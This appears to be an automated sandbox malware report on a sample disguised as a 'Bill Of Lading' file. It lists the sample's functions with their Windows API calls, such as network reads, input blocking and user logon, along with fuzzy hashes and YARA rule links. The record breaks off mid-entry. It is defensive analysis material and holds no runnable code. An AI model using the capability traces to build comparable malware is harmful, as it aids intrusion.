                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48322524-0
                                                                                                                      • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                      • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                      • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                      • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                      Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __time64.LIBCMT ref: 004433A2
                                                                                                                        • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                        • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                      • String ID: rJ
                                                                                                                      • API String ID: 2893107130-1865492326
                                                                                                                      • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                      • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                      • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                      • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                      Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __time64.LIBCMT ref: 004433A2
                                                                                                                        • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                        • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                      • String ID: rJ
                                                                                                                      • API String ID: 2893107130-1865492326
                                                                                                                      • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                      • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                      • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                      • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                      Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                        • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 901099227-0
                                                                                                                      • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                      • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                      • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                      • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                      Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                      • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                      • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                      • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                      Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 0vH$HH
                                                                                                                      • API String ID: 0-728391547
                                                                                                                      • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                      • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                      • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                      • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                      Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2102423945-0
                                                                                                                      • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                      • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                      • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                      • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                      Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Proc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2346855178-0
                                                                                                                      • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                      • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                      • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                      • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                      Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BlockInput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3456056419-0
                                                                                                                      • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                      • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                      • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                      • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                      Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LogonUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1244722697-0
                                                                                                                      • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                      • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                      • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                      • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                      Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2645101109-0
                                                                                                                      • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                      • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                      • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                      • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                      Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                      • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                      • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                      • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                      Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                      Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                      Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                      Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                      Function 04023A38 Relevance: .1, Instructions: 92COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction ID: 37d3b16e4d7fbdc1d408653d91c59978c189066bcc17fd4382dd9db6b1de8678
                                                                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                      • Instruction Fuzzy Hash: ED41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
                                                                                                                      Function 04023928 Relevance: .0, Instructions: 35COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
